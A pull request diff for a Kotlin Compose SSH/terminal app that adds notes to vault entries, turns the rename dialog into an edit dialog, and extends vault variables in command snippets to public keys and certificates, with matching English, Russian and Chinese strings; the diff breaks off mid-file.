### PR TITLE
Vault entry notes, and ${{vault:…}} for keys and certificates

### DIFF
--- a/composeApp/src/commonMain/composeResources/values-ru/strings_lib.xml
+++ b/composeApp/src/commonMain/composeResources/values-ru/strings_lib.xml
@@ -105,10 +105,19 @@
     <string name="lib_snippet_vars_preview">Предпросмотр команды</string>
     <string name="lib_snippet_vars_clipboard">Буфер обмена</string>
     <string name="lib_snippet_vars_clipboard_empty">(пусто)</string>
-    <string name="lib_snippet_vars_vault">Секреты хранилища</string>
+    <string name="lib_snippet_vars_vault">Записи хранилища</string>
     <string name="lib_snippet_vars_vault_unnamed">(непечатаемое имя)</string>
-    <string name="lib_snippet_vars_vault_missing">В хранилище нет пароля с именем «%1$s»</string>
-    <string name="lib_snippet_vars_vault_not_password">Запись «%1$s» в хранилище — не пароль</string>
+    <string name="lib_snippet_vars_vault_ambiguous">В хранилище несколько записей с именем «%1$s»</string>
+    <plurals name="lib_snippet_vars_vault_more">
+        <item quantity="one">и ещё %1$d</item>
+        <item quantity="few">и ещё %1$d</item>
+        <item quantity="many">и ещё %1$d</item>
+        <item quantity="other">и ещё %1$d</item>
+    </plurals>
+    <string name="lib_snippet_vars_vault_ready">«%1$s» готово</string>
+    <string name="lib_snippet_vars_vault_reading">Чтение «%1$s»…</string>
+    <string name="lib_snippet_vars_vault_missing">В хранилище нет записи «%1$s»</string>
+    <string name="lib_snippet_vars_vault_unusable">Записи «%1$s» нечего подставить</string>
     <string name="lib_snippet_vars_secret_note">Секреты вставляются открытым текстом — они видны на экране, в прокрутке и в истории shell.</string>
     <string name="lib_snippet_vars_recording_note">Идёт запись: развёрнутая команда попадёт в каст.</string>
     <string name="lib_snippet_vars_run">Запустить</string>
@@ -295,7 +304,7 @@
     <string name="lib_snippets_help_var_uuid">случайный UUID</string>
     <string name="lib_snippets_help_var_random">случайные символы; длина (не больше 64) и набор после двоеточия — alnum, hex или special; неизвестное имя откатывается к набору по умолчанию</string>
     <string name="lib_snippets_help_var_clipboard">системный буфер обмена, читается один раз при подтверждении</string>
-    <string name="lib_snippets_help_var_vault">пароль из хранилища по имени записи</string>
+    <string name="lib_snippets_help_var_vault">пароль или открытый ключ из хранилища по имени записи</string>
     <string name="lib_snippets_help_var_param">любое другое имя запрашивает значение перед запуском; часть после двоеточия — предзаполненное значение</string>
     <string name="lib_snippets_help_var_choices">варианты через | превращаются в список выбора; первый — значение по умолчанию</string>
     <string name="lib_snippets_help_examples">Примеры</string>

--- a/composeApp/src/commonMain/composeResources/values-ru/strings_vault.xml
+++ b/composeApp/src/commonMain/composeResources/values-ru/strings_vault.xml
@@ -35,7 +35,7 @@
     <string name="vault_export_failed_message">Файл не записан.</string>
     <string name="vault_export_dismiss">Закрыть</string>
     <string name="vault_delete">Удалить</string>
-    <string name="vault_rename">Переименовать</string>
+    <string name="vault_edit">Изменить</string>
     <string name="vault_cancel">Отмена</string>
     <string name="vault_used_by_one">Используется · 1 хостом</string>
     <string name="vault_used_by">Используется · %1$d хостами</string>
@@ -49,6 +49,7 @@
     <string name="vault_label_valid">Срок действия</string>
     <string name="vault_badge_expired">ИСТЁК</string>
     <string name="vault_label_serial">Серийный номер</string>
+    <string name="vault_label_note">Заметка</string>
     <string name="vault_label_signing_ca">Подписавший CA</string>
 
     <!-- Диалог создания SSH-ключа. -->
@@ -86,8 +87,11 @@
     <string name="vault_password_mismatch_retry">Пароль не подошёл — попробуйте ещё раз.</string>
     <string name="vault_copy">Скопировать</string>
 
-    <!-- Диалог переименования секрета. -->
-    <string name="vault_rename_title">Переименовать «%1$s»</string>
+    <!-- Диалог правки секрета: имя и заметка. -->
+    <string name="vault_edit_title">Изменить «%1$s»</string>
+    <string name="vault_field_note">ЗАМЕТКА</string>
+    <string name="vault_placeholder_note">напр. временный доступ для аудита, удалить в мае</string>
+    <string name="vault_save">Сохранить</string>
 
     <!-- Диалог удаления секрета. -->
     <string name="vault_delete_title">Удалить «%1$s»?</string>

--- a/composeApp/src/commonMain/composeResources/values-zh/strings_lib.xml
+++ b/composeApp/src/commonMain/composeResources/values-zh/strings_lib.xml
@@ -102,10 +102,16 @@
     <string name="lib_snippet_vars_preview">命令预览</string>
     <string name="lib_snippet_vars_clipboard">剪贴板</string>
     <string name="lib_snippet_vars_clipboard_empty">（空）</string>
-    <string name="lib_snippet_vars_vault">保险库密钥</string>
+    <string name="lib_snippet_vars_vault">保险库条目</string>
     <string name="lib_snippet_vars_vault_unnamed">（无法显示的名称）</string>
-    <string name="lib_snippet_vars_vault_missing">保险库中没有名为“%1$s”的密码</string>
-    <string name="lib_snippet_vars_vault_not_password">保险库条目“%1$s”不是密码</string>
+    <string name="lib_snippet_vars_vault_ambiguous">保险库中有多个名为“%1$s”的条目</string>
+    <plurals name="lib_snippet_vars_vault_more">
+        <item quantity="other">另有 %1$d 项</item>
+    </plurals>
+    <string name="lib_snippet_vars_vault_ready">“%1$s”已就绪</string>
+    <string name="lib_snippet_vars_vault_reading">正在读取“%1$s”…</string>
+    <string name="lib_snippet_vars_vault_missing">保险库中没有名为“%1$s”的条目</string>
+    <string name="lib_snippet_vars_vault_unusable">保险库条目“%1$s”没有可插入的内容</string>
     <string name="lib_snippet_vars_secret_note">密钥以明文形式插入命令——会显示在屏幕、回滚缓冲区和 shell 历史中。</string>
     <string name="lib_snippet_vars_recording_note">正在录制：解析后的命令将保存到录制文件中。</string>
     <string name="lib_snippet_vars_run">运行</string>
@@ -292,7 +298,7 @@
     <string name="lib_snippets_help_var_uuid">随机 UUID</string>
     <string name="lib_snippets_help_var_random">随机字符；冒号后为长度（最多 64）和字符集 — alnum、hex 或 special；未知名称回退到默认字符集</string>
     <string name="lib_snippets_help_var_clipboard">系统剪贴板，确认时读取一次</string>
-    <string name="lib_snippets_help_var_vault">按条目名称取保险库中的密码</string>
+    <string name="lib_snippets_help_var_vault">按条目名称取保险库中的密码或公钥</string>
     <string name="lib_snippets_help_var_param">其他任意名称会在运行前询问取值；冒号后的部分为预填默认值</string>
     <string name="lib_snippets_help_var_choices">用 | 分隔的选项会变成选择列表；第一项为默认值</string>
     <string name="lib_snippets_help_examples">示例</string>

--- a/composeApp/src/commonMain/composeResources/values-zh/strings_vault.xml
+++ b/composeApp/src/commonMain/composeResources/values-zh/strings_vault.xml
@@ -35,7 +35,7 @@
     <string name="vault_export_failed_message">文件未写入。</string>
     <string name="vault_export_dismiss">关闭</string>
     <string name="vault_delete">删除</string>
-    <string name="vault_rename">重命名</string>
+    <string name="vault_edit">编辑</string>
     <string name="vault_cancel">取消</string>
     <string name="vault_used_by_one">被 1 台主机使用</string>
     <string name="vault_used_by">被 %1$d 台主机使用</string>
@@ -49,6 +49,7 @@
     <string name="vault_label_valid">有效期</string>
     <string name="vault_badge_expired">已过期</string>
     <string name="vault_label_serial">序列号</string>
+    <string name="vault_label_note">备注</string>
     <string name="vault_label_signing_ca">签发 CA</string>
 
     <!-- 生成 SSH 密钥对话框 -->
@@ -86,8 +87,11 @@
     <string name="vault_password_mismatch_retry">密码不匹配——请重试。</string>
     <string name="vault_copy">复制</string>
 
-    <!-- 重命名密钥对话框 -->
-    <string name="vault_rename_title">重命名「%1$s」</string>
+    <!-- 编辑密钥对话框：名称与备注 -->
+    <string name="vault_edit_title">编辑「%1$s」</string>
+    <string name="vault_field_note">备注</string>
+    <string name="vault_placeholder_note">例如：审计临时访问，五月删除</string>
+    <string name="vault_save">保存</string>
 
     <!-- 删除密钥对话框 -->
     <string name="vault_delete_title">删除「%1$s」？</string>

--- a/composeApp/src/commonMain/composeResources/values/strings_lib.xml
+++ b/composeApp/src/commonMain/composeResources/values/strings_lib.xml
@@ -103,10 +103,17 @@
     <string name="lib_snippet_vars_preview">Command preview</string>
     <string name="lib_snippet_vars_clipboard">Clipboard</string>
     <string name="lib_snippet_vars_clipboard_empty">(empty)</string>
-    <string name="lib_snippet_vars_vault">Vault secrets</string>
+    <string name="lib_snippet_vars_vault">Vault entries</string>
     <string name="lib_snippet_vars_vault_unnamed">(unprintable name)</string>
-    <string name="lib_snippet_vars_vault_missing">No password named “%1$s” in the vault</string>
-    <string name="lib_snippet_vars_vault_not_password">Vault entry “%1$s” is not a password</string>
+    <string name="lib_snippet_vars_vault_ambiguous">More than one vault entry is named “%1$s”</string>
+    <plurals name="lib_snippet_vars_vault_more">
+        <item quantity="one">and %1$d more</item>
+        <item quantity="other">and %1$d more</item>
+    </plurals>
+    <string name="lib_snippet_vars_vault_ready">“%1$s” ready</string>
+    <string name="lib_snippet_vars_vault_reading">Reading “%1$s”…</string>
+    <string name="lib_snippet_vars_vault_missing">No vault entry named “%1$s”</string>
+    <string name="lib_snippet_vars_vault_unusable">Vault entry “%1$s” has nothing to insert</string>
     <string name="lib_snippet_vars_secret_note">Secrets are inserted as plain text — visible on screen, in scrollback and in shell history.</string>
     <string name="lib_snippet_vars_recording_note">Recording is on: the resolved command will be saved into the cast.</string>
     <string name="lib_snippet_vars_run">Run</string>
@@ -294,7 +301,7 @@
     <string name="lib_snippets_help_var_uuid">random UUID</string>
     <string name="lib_snippets_help_var_random">random characters; length (64 at most) and charset after the colon — alnum, hex or special; an unknown name falls back to the default set</string>
     <string name="lib_snippets_help_var_clipboard">system clipboard, read once at the confirmation</string>
-    <string name="lib_snippets_help_var_vault">password from the vault, by entry name</string>
+    <string name="lib_snippets_help_var_vault">password or public key from the vault, by entry name</string>
     <string name="lib_snippets_help_var_param">any other name asks for a value before the run; the part after the colon is the prefilled default</string>
     <string name="lib_snippets_help_var_choices">options separated by | become a list to pick from; the first is the default</string>
     <string name="lib_snippets_help_examples">Examples</string>

--- a/composeApp/src/commonMain/composeResources/values/strings_vault.xml
+++ b/composeApp/src/commonMain/composeResources/values/strings_vault.xml
@@ -35,7 +35,7 @@
     <string name="vault_export_failed_message">The file was not written.</string>
     <string name="vault_export_dismiss">Close</string>
     <string name="vault_delete">Delete</string>
-    <string name="vault_rename">Rename</string>
+    <string name="vault_edit">Edit</string>
     <string name="vault_cancel">Cancel</string>
     <string name="vault_used_by_one">Used by · 1 host</string>
     <string name="vault_used_by">Used by · %1$d hosts</string>
@@ -50,6 +50,7 @@
     <string name="vault_badge_expired">EXPIRED</string>
     <string name="vault_label_serial">Serial</string>
     <string name="vault_label_signing_ca">Signing CA</string>
+    <string name="vault_label_note">Note</string>
 
     <!-- Generate SSH key dialog. -->
     <string name="vault_dialog_generate_title">Generate SSH key</string>
@@ -86,8 +87,11 @@
     <string name="vault_password_mismatch_retry">That password didn't match — try again.</string>
     <string name="vault_copy">Copy</string>
 
-    <!-- Rename secret dialog. -->
-    <string name="vault_rename_title">Rename \"%1$s\"</string>
+    <!-- Edit secret dialog: name and note. -->
+    <string name="vault_edit_title">Edit \"%1$s\"</string>
+    <string name="vault_field_note">NOTE</string>
+    <string name="vault_placeholder_note">e.g. temporary access for the audit, remove in May</string>
+    <string name="vault_save">Save</string>
 
     <!-- Delete secret dialog. -->
     <string name="vault_delete_title">Delete \"%1$s\"?</string>

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/host/NewConnectionFormState.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/host/NewConnectionFormState.kt
@@ -8,7 +8,7 @@ import app.skerry.shared.ai.AiPolicy
 import app.skerry.shared.container.ContainerRuntime
 import app.skerry.shared.container.ContainerSpec
 import app.skerry.shared.host.Host
-import app.skerry.shared.host.normalizeNotes
+import app.skerry.shared.text.normalizeNotes
 import app.skerry.shared.rdp.RdpH264Mode
 import app.skerry.shared.rdp.RdpImageQuality
 import app.skerry.shared.rdp.RdpSpec
@@ -64,7 +64,7 @@ class NewConnectionFormState {
 
     /**
      * Free-form remark about the profile, raw as typed; normalized on the way into the draft
-     * ([app.skerry.shared.host.normalizeNotes]) so the cap and trimming apply once, at the store's edge.
+     * ([app.skerry.shared.text.normalizeNotes]) so the cap and trimming apply once, at the store's edge.
      */
     var notes: String by mutableStateOf("")
 

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/host/NewConnectionModal.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/host/NewConnectionModal.kt
@@ -37,7 +37,7 @@ import androidx.compose.ui.text.input.KeyboardType
 import androidx.compose.ui.unit.dp
 import androidx.compose.ui.unit.sp
 import app.skerry.shared.host.Host
-import app.skerry.shared.host.capNotes
+import app.skerry.shared.text.capNotes
 import app.skerry.shared.ssh.ConnectionType
 import app.skerry.shared.ssh.SshTarget
 import app.skerry.shared.ssh.usesSshAuth

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/identity/CredentialManagerController.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/identity/CredentialManagerController.kt
@@ -140,13 +140,23 @@ class CredentialManagerController(
         scope.launch { runCatching { log.event(id) }.onSuccess { usageById = usageById + (id to it) } }
     }
 
-    /** Creates (if [CredentialDraft.id] == null) or updates a secret; returns the assigned id. */
+    /**
+     * Creates (if [CredentialDraft.id] == null) or updates a secret; returns the assigned id.
+     *
+     * The id comes back whether or not anything was written: [CredentialStore.putKeepingNote] no-ops
+     * on a record deleted in the meantime, and nothing here can tell. Harmless while every draft is
+     * a new secret, as they all are today — a form that edits an existing one has to read the record
+     * back before it reports the save as done.
+     */
     fun save(draft: CredentialDraft): String {
         val id = draft.id ?: newId()
         val secret = draft.toSecret()
         // Compared before the write: afterwards the store already holds the new material.
-        val rotated = draft.id != null && find(draft.id)?.secret?.let { it != secret } == true
-        store.put(Credential(id = id, label = draft.label, secret = secret))
+        val rotated = draft.id?.let { find(it) }?.secret?.let { it != secret } == true
+        // The note is not part of the draft — no form has a field for it, only [edit] writes one —
+        // so the store keeps whatever is on the record. No form re-saves an existing secret today;
+        // this is what a rotation form would need the moment one is wired.
+        store.putKeepingNote(Credential(id = id, label = draft.label, secret = secret))
         // Only a new secret is born here; replacing the material of an existing one is a rotation,
         // which is what the row reports as "rotated 12 days ago". Re-saving the same material is
         // neither — a rename must not read as a key change.
@@ -159,12 +169,13 @@ class CredentialManagerController(
     }
 
     /**
-     * Renames a secret in place — keeps its id and secret material, changing only the label — and
-     * reloads the list. A no-op if [id] is missing/deleted. The rename propagates to sync on its own
-     * (it's a re-put of the same record; see [CredentialStore.rename]).
+     * Edits a secret in place — keeps its id and secret material, changing only the label and the
+     * note — and reloads the list. A no-op if [id] is missing/deleted. The edit propagates to sync on
+     * its own (it's a re-put of the same record; see [CredentialStore.edit]). [note] arrives already
+     * normalized ([app.skerry.shared.text.normalizeNotes]).
      */
-    fun rename(id: String, label: String) {
-        store.rename(id, label)
+    fun edit(id: String, label: String, note: String?) {
+        store.edit(id, label, note)
         credentials = store.all()
     }
 

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/mobile/MobileNewConnectionSheet.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/mobile/MobileNewConnectionSheet.kt
@@ -33,7 +33,7 @@ import androidx.compose.ui.text.font.FontWeight
 import androidx.compose.ui.text.input.KeyboardType
 import androidx.compose.ui.unit.dp
 import androidx.compose.ui.unit.sp
-import app.skerry.shared.host.capNotes
+import app.skerry.shared.text.capNotes
 import app.skerry.shared.ssh.ConnectionType
 import app.skerry.shared.ssh.SshTarget
 import app.skerry.shared.ssh.usesSshAuth

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/mobile/MobileVaultView.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/mobile/MobileVaultView.kt
@@ -67,7 +67,7 @@ import app.skerry.ui.generated.resources.vault_import_certificate
 import app.skerry.ui.generated.resources.vault_key_unreadable
 import app.skerry.ui.generated.resources.vault_label_public_key
 import app.skerry.ui.generated.resources.vault_link_key_file
-import app.skerry.ui.generated.resources.vault_rename
+import app.skerry.ui.generated.resources.vault_edit
 import app.skerry.ui.generated.resources.vault_subtitle_certificate
 import app.skerry.ui.generated.resources.vault_subtitle_certificate_typed
 import app.skerry.ui.generated.resources.vault_subtitle_key_file
@@ -129,9 +129,10 @@ import app.skerry.ui.app.LocalVault
 import app.skerry.ui.app.LocalVaultBiometrics
 import app.skerry.ui.app.MobileDesignState
 import app.skerry.ui.vault.PasswordConfirmDialog
-import app.skerry.ui.vault.RenameSecretDialog
+import app.skerry.ui.vault.EditSecretDialog
 import app.skerry.ui.design.PrimaryButton
 import app.skerry.ui.vault.SecretIcon
+import app.skerry.ui.vault.SecretNote
 import app.skerry.ui.design.Sym
 import app.skerry.ui.design.Txt
 import app.skerry.ui.design.modalBody
@@ -196,7 +197,7 @@ private fun MobileVaultLive(state: MobileDesignState, credentials: CredentialMan
     val secretFiles = LocalSecretFileReader.current
     var showImportCert by remember { mutableStateOf(false) }
     var showLinkKeyFile by remember { mutableStateOf(false) }
-    var pendingRename by remember { mutableStateOf<Credential?>(null) }
+    var pendingEdit by remember { mutableStateOf<Credential?>(null) }
     var pendingDelete by remember { mutableStateOf<Credential?>(null) }
 
     val credItems = VaultPresentation.credentialsIn(category, allCreds)
@@ -208,7 +209,7 @@ private fun MobileVaultLive(state: MobileDesignState, credentials: CredentialMan
     // over the centered dialog and covers the bottom input fields above the keyboard. LaunchedEffect
     // writes the flag only on value change (not every list recomposition); DisposableEffect clears it
     // on leaving the tab so the tab bar isn't left hidden.
-    val modalOpen = showGenerate || showAddPassword || showImportCert || showLinkKeyFile || pendingRename != null || pendingDelete != null ||
+    val modalOpen = showGenerate || showAddPassword || showImportCert || showLinkKeyFile || pendingEdit != null || pendingDelete != null ||
         selectedCred != null || copyAuth.passwordPromptVisible || exportFailed || showHelp
     LaunchedEffect(modalOpen) { state.modalOverlay(modalOpen) }
     DisposableEffect(Unit) { onDispose { state.modalOverlay(false) } }
@@ -323,17 +324,18 @@ private fun MobileVaultLive(state: MobileDesignState, credentials: CredentialMan
                 },
             )
         }
-        pendingRename?.let { target ->
-            // Rename edits only the label; the id (hosts reference it) and the secret stay put, and the
-            // change propagates to sync on its own (see CredentialManagerController.rename).
-            RenameSecretDialog(
+        pendingEdit?.let { target ->
+            // Editing touches only the name and the note; the id (hosts reference it) and the secret stay
+            // put, and the change propagates to sync on its own (see CredentialManagerController.edit).
+            EditSecretDialog(
                 currentLabel = target.label,
-                onDismiss = { pendingRename = null },
-                onConfirm = { newLabel ->
+                currentNote = target.note,
+                onDismiss = { pendingEdit = null },
+                onConfirm = { newLabel, newNote ->
                     // Abort on a lock race: idle auto-lock can fire while the dialog is open, and vault
                     // CRUD throws once locked. Mirrors the delete guard.
-                    if (vault?.isUnlocked == true) credentials.rename(target.id, newLabel)
-                    pendingRename = null
+                    if (vault?.isUnlocked == true) credentials.edit(target.id, newLabel, newNote)
+                    pendingEdit = null
                 },
             )
         }
@@ -378,9 +380,9 @@ private fun MobileVaultLive(state: MobileDesignState, credentials: CredentialMan
                 onExportPublic = { export -> exportPublic(export, scope) { exportFailed = it.worthReporting } },
                 // Close the detail sheet before showing a centered dialog (rename/delete): otherwise the
                 // sheet, drawn on top, would cover it and leave only its edge visible.
-                onRename = {
+                onEdit = {
                     selectedId = null
-                    pendingRename = credential
+                    pendingEdit = credential
                 },
                 onDelete = {
                     selectedId = null
@@ -578,7 +580,7 @@ private fun MobileSecretDetailSheet(
     onCopyPassword: (String) -> Unit,
     onExportKey: (SecretExport.PrivateKey) -> Unit,
     onExportPublic: (SecretExport.Public) -> Unit,
-    onRename: () -> Unit,
+    onEdit: () -> Unit,
     onDelete: () -> Unit,
     onDismiss: () -> Unit,
 ) {
@@ -610,6 +612,7 @@ private fun MobileSecretDetailSheet(
                     // 14dp apart is the noise this redesign removed from the rows.
                     Txt(credential.label, color = Skerry.colors.text, size = 15.sp, weight = FontWeight.SemiBold)
                 }
+                SecretNote(credential.note)
                 SecretFactRows(
                     typeLabel = subtitle,
                     fingerprint = keyInfo?.fingerprintSha256?.let { shortFingerprint(it) }
@@ -632,8 +635,8 @@ private fun MobileSecretDetailSheet(
                 }
                 UsedByHosts(hosts, snippetLabels, mono)
                 Column(verticalArrangement = Arrangement.spacedBy(10.dp)) {
-                    // Copy is type-specific (what's copyable differs); rename is universal and edits only
-                    // the label; export/delete are type-specific again.
+                    // Copy is type-specific (what's copyable differs); edit is universal and touches only
+                    // the name and the note; export/delete are type-specific again.
                     when (secret) {
                         is CredentialSecret.Certificate ->
                             MobileSheetButton(stringResource(Res.string.vault_copy_certificate), onClick = { onCopy(secret.certificate) }, icon = "content_copy", modifier = Modifier.fillMaxWidth())
@@ -647,7 +650,7 @@ private fun MobileSecretDetailSheet(
                         // Nothing to copy: the material is on disk, and the refs are already spelled out above.
                         is CredentialSecret.KeyFile -> Unit
                     }
-                    MobileSheetButton(stringResource(Res.string.vault_rename), onClick = onRename, filled = false, modifier = Modifier.fillMaxWidth())
+                    MobileSheetButton(stringResource(Res.string.vault_edit), onClick = onEdit, filled = false, modifier = Modifier.fillMaxWidth())
                     // Export hands out the private key; see the desktop panel.
                     val deleteButton: @Composable (Modifier) -> Unit = { modifier ->
                         MobileSheetButton(stringResource(Res.string.vault_delete), onClick = onDelete, filled = false, danger = true, modifier = modifier)

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/runbook/RunbookStartDialog.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/runbook/RunbookStartDialog.kt
@@ -35,7 +35,6 @@ import app.skerry.ui.design.Txt
 import app.skerry.ui.design.consumeClicks
 import app.skerry.ui.generated.resources.Res
 import app.skerry.ui.generated.resources.lib_snippet_vars_recording_note
-import app.skerry.ui.generated.resources.lib_snippet_vars_secret_note
 import app.skerry.ui.generated.resources.runbook_panel_shell_note
 import app.skerry.ui.generated.resources.runbook_run
 import app.skerry.ui.generated.resources.runbook_run_title
@@ -44,6 +43,7 @@ import app.skerry.ui.generated.resources.runbook_steps
 import app.skerry.ui.generated.resources.runbook_untitled
 import app.skerry.ui.generated.resources.shell_cancel
 import app.skerry.ui.snippet.TemplateVariableFields
+import app.skerry.ui.snippet.SecretPlaintextNotice
 import app.skerry.ui.snippet.rememberTemplateVariableValues
 import app.skerry.ui.theme.Skerry
 import org.jetbrains.compose.resources.stringResource
@@ -89,10 +89,14 @@ private fun RunbookStartDialogContent(
     val values = rememberTemplateVariableValues(request, variables)
 
     val canRun = values.canRun
+    // Computed when the resolution changes, not on every keystroke: each call sanitizes the resolved
+    // passwords afresh, and a dialog whose job is to contain a secret should not leave a copy of it
+    // on the heap per character typed.
+    val secrets = remember(values.vaultResolutions) { values.vaultSecrets() }
     val confirm = {
         // The values are read once, here, and handed over as a snapshot. The vault secrets ride
         // along so the production guard can mask them in its own confirmation.
-        if (canRun) onConfirm(runbookValueSnapshot(variables) { values.value(it, masked = false) }, values.vaultSecrets())
+        if (canRun) onConfirm(runbookValueSnapshot(variables) { values.value(it, masked = false) }, secrets)
     }
 
     // A runbook with no free-text parameter — the ordinary one — leaves nothing inside to claim
@@ -206,12 +210,7 @@ private fun RunbookStartDialogContent(
                     stringResource(Res.string.runbook_panel_shell_note), color = Skerry.colors.faint,
                     size = 11.sp, lineHeight = 15.sp, modifier = Modifier.padding(top = 4.dp),
                 )
-                if (values.vaultRefs.isNotEmpty()) {
-                    Txt(
-                        stringResource(Res.string.lib_snippet_vars_secret_note), color = Skerry.colors.faint,
-                        size = 11.sp, lineHeight = 15.sp, modifier = Modifier.padding(top = 8.dp),
-                    )
-                }
+                SecretPlaintextNotice(secrets, topPadding = 8.dp)
                 if (request.recording) {
                     Txt(
                         stringResource(Res.string.lib_snippet_vars_recording_note), color = Skerry.colors.sunset,

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/SnippetRunDialog.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/SnippetRunDialog.kt
@@ -36,7 +36,6 @@ import app.skerry.ui.generated.resources.Res
 import app.skerry.ui.generated.resources.lib_snippet_vars_preview
 import app.skerry.ui.generated.resources.lib_snippet_vars_recording_note
 import app.skerry.ui.generated.resources.lib_snippet_vars_run
-import app.skerry.ui.generated.resources.lib_snippet_vars_secret_note
 import app.skerry.ui.generated.resources.lib_snippets_run_title
 import app.skerry.ui.generated.resources.lib_snippets_untitled
 import app.skerry.ui.generated.resources.shell_cancel
@@ -90,6 +89,10 @@ private fun SnippetRunDialogContent(
 
     val preview = SnippetTemplate.assemble(request.segments, machine) { contextValue(it, masked = true) }
     val canRun = values.canRun
+    // Computed when the resolution changes, not on every keystroke: each call sanitizes the resolved
+    // passwords afresh, and a dialog whose job is to contain a secret should not leave a copy of it
+    // on the heap per character typed.
+    val secrets = remember(values.vaultResolutions) { values.vaultSecrets() }
     val confirm = {
         // The vault secrets ride along so the production guard's confirmation — one dialog later on
         // a #prod host — can mask the same spans this dialog's preview masked.
@@ -97,7 +100,7 @@ private fun SnippetRunDialogContent(
             onConfirm(
                 SnippetTemplate.assemble(request.segments, machine) { contextValue(it, masked = false) },
                 values.paramValues(),
-                values.vaultSecrets(),
+                secrets,
             )
         }
     }
@@ -152,9 +155,7 @@ private fun SnippetRunDialogContent(
                 // the notice counts characters that change on every keystroke, and a live region
                 // would read a new line out per character typed.
                 ClippedNotice(clipped, preview.length, announce = !takesFocus)
-                if (values.vaultRefs.isNotEmpty()) {
-                    Txt(stringResource(Res.string.lib_snippet_vars_secret_note), color = Skerry.colors.faint, size = 11.sp, lineHeight = 15.sp, modifier = Modifier.padding(top = 10.dp))
-                }
+                SecretPlaintextNotice(secrets, topPadding = 10.dp)
                 if (request.recording) {
                     Txt(stringResource(Res.string.lib_snippet_vars_recording_note), color = Skerry.colors.sunset, size = 11.sp, lineHeight = 15.sp, modifier = Modifier.padding(top = 6.dp))
                 }

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/TemplateVariables.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/TemplateVariables.kt
@@ -4,6 +4,7 @@ import androidx.compose.foundation.background
 import androidx.compose.foundation.border
 import androidx.compose.foundation.layout.Arrangement
 import androidx.compose.foundation.layout.Box
+import androidx.compose.foundation.layout.Column
 import androidx.compose.foundation.layout.Row
 import androidx.compose.foundation.layout.fillMaxWidth
 import androidx.compose.foundation.layout.padding
@@ -28,6 +29,7 @@ import androidx.compose.ui.graphics.SolidColor
 import androidx.compose.ui.platform.LocalClipboard
 import androidx.compose.ui.text.TextStyle
 import androidx.compose.ui.text.style.TextOverflow
+import androidx.compose.ui.unit.Dp
 import androidx.compose.ui.unit.dp
 import androidx.compose.ui.unit.sp
 import app.skerry.shared.snippet.SnippetSegment
@@ -35,11 +37,12 @@ import app.skerry.shared.snippet.SnippetVariableKind
 import app.skerry.shared.snippet.paramChoices
 import app.skerry.shared.snippet.paramDefault
 import app.skerry.shared.snippet.sanitizeSnippetValue
-import app.skerry.shared.vault.CredentialSecret
 import app.skerry.ui.app.LocalCredentials
+import app.skerry.ui.app.LocalSshKeyGenerator
 import app.skerry.ui.design.DropdownField
 import app.skerry.ui.design.FieldLabel
 import app.skerry.ui.design.LocalFonts
+import app.skerry.ui.design.StatusAnnouncer
 import app.skerry.ui.design.fieldFocus
 import app.skerry.ui.design.fieldName
 import app.skerry.ui.design.rememberFieldDraft
@@ -48,14 +51,21 @@ import app.skerry.ui.design.untrustedLabel
 import app.skerry.ui.design.Txt
 import app.skerry.ui.generated.resources.Res
 import app.skerry.ui.generated.resources.lib_snippet_vars_clipboard
+import app.skerry.ui.generated.resources.lib_snippet_vars_secret_note
 import app.skerry.ui.generated.resources.lib_snippet_vars_clipboard_empty
 import app.skerry.ui.generated.resources.lib_snippet_vars_vault
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_ambiguous
 import app.skerry.ui.generated.resources.lib_snippet_vars_vault_missing
-import app.skerry.ui.generated.resources.lib_snippet_vars_vault_not_password
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_more
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_ready
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_reading
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_unusable
 import app.skerry.ui.generated.resources.lib_snippet_vars_vault_unnamed
-import app.skerry.ui.identity.CredentialManagerController
 import app.skerry.ui.terminal.fetchSystemClipboardText
 import app.skerry.ui.theme.Skerry
+import kotlinx.coroutines.Dispatchers
+import kotlinx.coroutines.withContext
+import org.jetbrains.compose.resources.pluralStringResource
 import org.jetbrains.compose.resources.stringResource
 import app.skerry.ui.design.FormField
 import androidx.compose.ui.text.style.TextDirection
@@ -105,19 +115,6 @@ internal fun maskSecrets(text: String, secrets: List<String>): String {
 internal fun vaultEntryLabel(name: String): String =
     spaceLabel(name, fallback = stringResource(Res.string.lib_snippet_vars_vault_unnamed))
 
-/** Vault reference resolution, done once when the confirmation opens. */
-internal sealed interface VaultRef {
-    data class Ok(val secret: String) : VaultRef
-    data object Missing : VaultRef
-    data object NotAPassword : VaultRef
-}
-
-private fun resolveVaultRef(name: String, credentials: CredentialManagerController?): VaultRef {
-    val entry = credentials?.credentials?.firstOrNull { it.label == name } ?: return VaultRef.Missing
-    val password = entry.secret as? CredentialSecret.Password ?: return VaultRef.NotAPassword
-    return VaultRef.Ok(password.password)
-}
-
 /**
  * The context side of `${{…}}` resolution — everything the machine can't produce on its own:
  * prompted parameters, the system clipboard and vault look-ups. Shared by the snippet confirmation
@@ -135,7 +132,6 @@ class TemplateVariableValues internal constructor(
     val vaultRefs: List<String>,
     /** Whether anything references `${{clipboard}}` (it is only read if so). */
     val needsClipboard: Boolean,
-    internal val vaultResolutions: Map<String, VaultRef>,
     internal val params: SnapshotStateMap<String, String>,
 ) {
     /** What each parameter was seeded with — the template's default, or the previous run's value. */
@@ -143,6 +139,13 @@ class TemplateVariableValues internal constructor(
 
     /** True while [name] still holds what the form put there, so its field may select on focus. */
